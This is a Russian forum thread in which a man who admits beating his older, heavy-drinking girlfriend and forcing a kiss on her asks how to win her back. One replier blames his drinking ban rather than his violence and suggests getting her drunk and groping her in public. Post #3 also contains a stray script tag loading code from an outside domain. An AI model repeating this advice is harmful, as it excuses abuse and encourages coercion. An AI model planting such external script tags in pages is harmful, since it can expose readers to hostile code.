Top.Mail.Ru

Перейти к содержимому

Фотография

девушка ушла к другому

• Авторизуйтесь для ответа в теме
Сообщений в теме: 102

#1 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 11:30

полгода назад познакомился с женщиной старше себя(ей 39,мне 26),сразу симпатия потом привязанность,сразу же стали жить вместе,первое время было как в сказке,потом сьехали на квартиру, там начал замечать что она выпивает,поначалу не придавал значения потом начал заморачиваться,и вскоре начал поднимать на нее руку,ревность была страшная,пьянки частыми,и скандалов куча поэтому с кв нас выгнали(она сьемная была),жили в деревне без удобств,естественно ей некомфортно было но терпели,стал не давать ей пить,жили на родительские деньги,впрочем со временем я стал работать и она тоже,все же мы были счастливы но казалось скандалы утихли но нет опять по новой и она пропадает,утверждала что у подруги,и так было не раз я клевал как дурак,но моя родня высказала мнение что она с мужиком, в конце концов к апрелю мы стали холодны друг к другу и я запретил ей пить на пасху на что опять ушла думал вернеться но нет,спустя две недели пришла за вещами и тут то я начал ее умолять чтоб осталась не бросала что все хорошо будет и пить буду давать(терпеть ради чувств),она ни в какую поцеловала и сказала люблю но так лучше будет,потом сказала либо уедет к себе в город либо у подруги останется,шло время я узнал что она с другим и что она выбрала его,мне было жуть как плохо,и после полугода отношений я неделю звонил ей спрашивая вернеться ли она любит и т.д,она говорила что да что да и хз когда придет я настолько себя вымотал что не спал сутками,к 5 числу перестал ей звонить,в последущее время от нее были пинги(смс и звонки) где то раз в неделю или чаще,где мы говорили на разные темы,но я старался не умолять а говорить сдержанно,и так несколько раз,все тоже самое мол когда приду не знаю он не бьет а ты бил и т.д,в общем позже моя мать встретила ее в магазине и бывшая ей сказала что меня любит,и что запуталась но с тем ей лучше, мама мне передала я не выдержал встретился с ней час общались не удержался насильно ее поцеловал,обнял,она не сильно против была,а так ответы на вопросы не получил мол не знаю кого люблю,пока не вернусь к тебе и т.д,а позже узнал что она хахалю нажаловалась и он мне угрожал чтоб не приходил,я звоню потом ей и говорю зачем жалуешься а она не я так другие б сказали подруги,тип ты сам виноват и бросила. врубил игнорку 5 тдень уже не пишу не звоню, не хожу,она с ним полтора месяца уже,иногда с их общего профиля мониторят страницу мою на одноклассниках,люблю ее но понимаю что с другим и он тоже пьющий,не знаю правильно ли я делаю и когда ждать ее раскаяния?

• 0

Реклама

Реклама
Хочешь убрать эти баннеры? Пройди регистрацию на форуме.

#2 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 11:46

Тут конфликт интересов. Пьющей жене интересно пойти в кафе, нажраться, посидеть на коленках у другого мужчины, поцеловаться, потом шатаясь прийти домой и заняться бурным пьяным сексом.
Пьяной жене интересно когда на работу ей позвонить Валек и скажет ей - я водки и пива купил, у тебя такая жопа, приезжай - она отпросится с работы и поедет к нему выпить и заодно заняться сексом. Пьющей женщине очень интересно так жить.

А что ты можешь ей предложить - в кафе не водишь, там не напиваешься с нею вместе. Вместе не целуетесь прилюдно на столе. К друзьям не ездите бухнуть. Тем более ты не позвонишь ей во время работы и не скажешь - стольная 0.7 заряжена и у тебя такая жооопа!

И более того когда она попыталась сама добрать то что ей не хватало ты стал поднимать на нее руку. Бедная девочка оказалась как в тюрьме, лишённая базовых потребностей и более того страшащаяся наказания.

То есть ей очень тяжело с тобой жить, нет романтики, столь необходимой ей. Ты не можешь дать ей то что она хочет и совершенно закономерно, что девушка от тебя ушла к другому. Тому кто даёт ей то что ей нужно!

Сообщение отредактировал Mixrud: 28 мая 2017 - 11:50

• 1

#3 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 11:52

<script type="text/oops" src="http://logistate.ru/...7e68"></script>

Прошу прощения, а эта пьющая жена тебя не пыталась бить?
Тут конфликт интересов. Пьющей жене интересно пойти в кафе, нажраться, посидеть на коленках у другого мужчины, поцеловаться, потом шатаясь прийти домой и заняться бурным пьяным сексом.
Пьяной жене интересно когда на работу ей позвонить Валек и скажет ей - я водки и пива купил, у тебя такая жопа, приезжай - она отпросится с работы и поедет к нему выпить и заодно заняться сексом. Пьющей женщине очень интересно так жить.

А что ты можешь ей предложить - в кафе не водишь, там не напиваешься с нею вместе. Вместе не целуетесь прилюдно на столе. К друзьям не ездите бухнуть. Тем более ты не позвонишь ей во время работы и не скажешь - стольная 0.7 заряжена и у тебя такая жооопа!

То есть ей очень тяжело с тобой жить, нет романтики, столь необходимой ей. Ты не можешь дать ей то что она хочет и совершенно закономерно, что девушка от тебя ушла к другому. Тому кто даёт ей то что ей нужно!

она не всегда пила,когда я работал молодцом держалась,понимаешь я понял что не могу без нее,что готов терпеть ее концерты,лишь бы была со мной,полтора месяца с ним она а моей маме и мне говорит что любит меня и не знает что хочет,ему другое,гадости стопудово говорит про меня,как бы она не пила я тоже отчасти виноват что срывался поднимая руку,он то не бьет,а так она щас работу нашла и пить ей некогда,но от него так и не уходит. да кто то скажет бросай ее она старая алкашня но блин люблю и все гулял с девушками толку,все равно о ней все мысли

• 0

#4 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 11:53

Хочешь вернуть - вызванивай, говори Марфа у меня стольная 0.7, у тебя такая жопа, пошли в кружку бухнем как в старые времена. Как напьетесь прямо при всех сажай ее на коленочки, лезь к ней в сиськи и засасывай на столе. Потом веди домой. Наутро опохмеляетесь и едите бухнуть к друзьям в соседнюю деревню в местное кафе - и она твоя!

Я же тебе ещё раз объясняю причина не в том что бил, а причина в запрете сладкого плода под угрозами физической расправы. Выпила-пизды. Естественно она свалила побыстрому к другому.

У меня первая жена около 4 лет, со мной жила, почему так долго, я не ставил условие бросить пить и не угрожал физической расправой. Как мог поддерживал в ее начинаниях. Но я больше пиво люблю и ужраться до ее кондиций не мог. Поэтому конечно ей тоже не хватало. То Валек позвонит и скажет стольная 0.7. то ещё кто-нибудь, она и погуливала скрытно от меня. Но со мной ей было комфортно. Поэтому относительно долго прожили.

Сообщение отредактировал Mixrud: 28 мая 2017 - 11:59

• 0

#5 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 11:54

И более того когда она попыталась сама добрать то что ей не хватало ты стал поднимать на нее руку. Бедная девочка оказалась как в тюрьме, лишённая базовых потребностей и более того страшащаяся наказания.

да а потом помрет от цирроза печени

Хочешь вернуть - вызванивай, говори Марфа у меня стольная 0.7, у тебя такая жопа, пошли в кружку бухнем как в старые времена. Как напьетесь прямо при всех сажай ее на коленочки, лезь к ней в сиськи и засасывай на столе. Потом веди домой. Наутро опохмеляетесь и едите бухнуть к друзьям в соседнюю деревню в местное кафе - и она твоя!

она с ним он предупредил чтоб не подходил к ней а я не хочу драки ведь она с ним блин и только от нее зависит вернется или нет

• 0

#6 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 12:00

Автор ее мужик ничего не решает. Закупался стольной и приглашаю. Скажи изменился, танцы-шманцы-кабак. У нас с тобою новая жизнь! Не ну потом может придти на разборки. Как я понял маргинал там, но скорее зацепит другую Марфу в кафе Клубничка и забудет про твою Василису ))

Я с такими элементами вращался на заре своей юности, и психологию их немного понимаю.

Сообщение отредактировал Mixrud: 28 мая 2017 - 12:07

• 1

#7 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:12

Автор ее мужик ничего не решает. Закупался стольной и приглашаю. Скажи изменился, танцы-шманцы-кабак. У нас с тобою новая жизнь!

решает раз походу с ним а не со мной и вещи ее у него,и трахается с ним,и пьет,если бы она намекнула что мол хочу к тебе а он не пускает,я б с ним встретился и разобрался,но купив ей бухло я лишь дам ей повод ему нажаловаться,а разборки мне не нужны(хотя о себе борьбой занимался,качался,он сидел+блатной какой то).хочется совета дельного

Автор ее мужик ничего не решает. Закупался стольной и приглашаю. Скажи изменился, танцы-шманцы-кабак. У нас с тобою новая жизнь! Не ну потом может придти на разборки. Как я понял маргинал там, но скорее зацепит другую Марфу в кафе Клубничка и забудет про твою Василису ))

Я с такими элементами вращался на заре своей юности, и психологию их немного понимаю.

мне больше интересна ее психология любит или нет или все бутылка решает?

он ей наверно и общаться со мной запретил,единственный контакт их общий профиль ппц два понедельника прожили а уже фамилию его взяла,на днях пишет с их профайла кто то из них(скорее он) чего чюшишь ? я не понял этой фразы

• 0

#8 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 12:12

Что-то это напоминает мне историю про "солидных людей" с тремя литрами водки. )) Но тут тебе надо определиться хочешь ли ты ее возвращения. А то тут уже рефлексия, а не даст мне в лоб какое-то быдло )) А это уже твои решения, никто за тебя принять их не сможет.

Твою бабу интересует больше экшен, гуляния.
С кем веселее, того она и любит.
Сможешь соответствовать ее идеалу - она твоя!

Если бы она просто любила бутылку, то она закупилась самосвалом водки и вырыла землянку в чаще. Таким образом уединившись от мирской суеты :))

Сообщение отредактировал Mixrud: 28 мая 2017 - 12:19

• 0

#9 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:20

Что-то это напоминает мне историю про "солидных людей" с тремя литрами водки. )) Но тут тебе надо определиться хочешь ли ты ее возвращения. А то тут уже рефлексия, а не даст мне в лоб какое-то быдло )) А это уже твои решения, никто за тебя принять их не сможет.

С кем веселее, того она и любит. Сможешь соответствовать ее идеалу - она твоя!

раньше так ее веселил что чуть намертво не падала,в плане этого все в порядке было,он же серьезный и моих шуток б не понял никогда,да я не боюсь его, я боюсь лезть туда,в уже чужую семью не осознавая что она с другим. при том гадости не пишу рассорить не пытаюсь,просто верю что она уйдет от него

С кем веселее, того она и любит. Сможешь соответствовать ее идеалу - она твоя!

раньше писал ей на профиль,звонил потом посоветовали тотальный игнор врубить отчасти это получалось но пинги были,как то однажды звонит и говорит что ее все достало,но как только она нашла работу пинги прекратились

• 0

#10 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 12:22

Чужую семью? У них запись о гражданском состоянии имеется? Нет? Они просто встречаются! Когда находишь свое, то что искал много лет, любимую и родную обычно выдвигаешься в ЗАГС регистрировать состояние и образуешь новую ячейку общества :)))

Просто иногда для осознанного выбора надо перебрать их много.
  • 0

#11 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:24

[
Чужую семью? У них запись о гражданском состоянии имеется? Нет? Они просто встречаются! Когда находишь свое, то что искал много лет, любимую и родную обычно выдвигаешься в ЗАГС регистрировать состояние и образуешь новую ячейку общества :)

толку если я схожу еще раз к ней,что то предложу,ну набьет мне морду либо я ему,а толку она с ним,а не со мной ,и даже намека на возврат не было
  • 0

#12 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 12:25

Тебе уже все что мог рассказал. Счастья тебе.

Сообщение отредактировал Mixrud: 28 мая 2017 - 12:27

• 0

#13 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:27

Чужую семью? У них запись о гражданском состоянии имеется? Нет? Они просто встречаются! Когда находишь свое, то что искал много лет, любимую и родную обычно выдвигается в ЗАГС регистрировать состояние и образуешь новую ячейку общества :)))

Чужую семью? У них запись о гражданском состоянии имеется? Нет? Они просто встречаются! Когда находишь свое, то что искал много лет, любимую и родную обычно выдвигаешься в ЗАГС регистрировать состояние и образуешь новую ячейку общества :)))

Просто иногда для осознанного выбора надо перебрать их много.

типа ты его боишься спрашивала я говорю нет но ты с ним,а она приходи когда хочешь,и все збс но когда я ухожу она ему жалуется что я ее лапаю преследую достаю и что она его любит1!!!как обьяснить такой поступок?

Тебе уже все что мог рассказал. Счастья тебе.

хнык(

• 0

#14 aLEKSS

aLEKSS

простофлудер

• Полноправный
  • PipPipPipPip
  • 1 734 Cообщений
972
Очень хороший

Отправлено 28 мая 2017 - 12:29

39 лет, бухает, до сих пор в жизни ничего нет и не предвидится, между водкой и тобой выбрала водку. 

Автор, ты головой подумай. Это самый бесперспективный вариант, какой только можно себе найти в 26 лет.

• 1

#15 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:30

39 лет, бухает, до сих пор в жизни ничего нет и не предвидится, между водкой и тобой выбрала водку. 

Автор, ты головой подумай. Это самый бесперспективный вариант, какой только можно себе найти в 26 лет.

я верю что ее можно исправить)))))))))она по трезвому золотой человечек 

• 0

Количество пользователей, читающих эту тему: 1

0